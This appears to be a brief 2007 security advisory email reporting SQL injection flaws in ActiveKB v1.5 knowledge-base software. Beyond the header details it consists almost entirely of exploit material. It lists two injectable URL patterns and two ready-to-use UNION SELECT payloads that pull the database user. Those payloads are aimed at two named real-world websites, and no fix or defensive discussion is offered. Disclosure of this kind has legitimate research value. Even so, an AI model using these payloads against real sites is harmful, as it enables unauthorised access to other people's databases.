Hello, 3APA3A.
Software: ActiveKB v1.5
Vendor: www.interspire.com
Vulnerability: multiple SQL injections
Risk: medium
Date: 27.08.2007
discovered by durito [damagelab] -durito[at]mail[dot]ru-
HTTP: durito.narod.ru
+~~~:| Details |:
SQL injections
+~~~:| Exploit |:
http://www.target.com/activekb/index.php?ToDo=browse&catId=[SQL]
http://www.target.com/activekb/admin/index.php?ToDo=hideQuestion&questId=[SQL]
+~~~:| Example |:
http://www.accessecu.com/kb/index.php?ToDo=browse&catId=5+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(user(),0x73),0x73),4,5,6,7/*
http://summitsupport.net/index.php?ToDo=browse&catId=5+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(user(),0x73),0x73),4,5,6,7/*
–
Best regards,
durito [NGH Group] mailto:[email protected]
http://durito.narod.ru
http://ngh.void.ru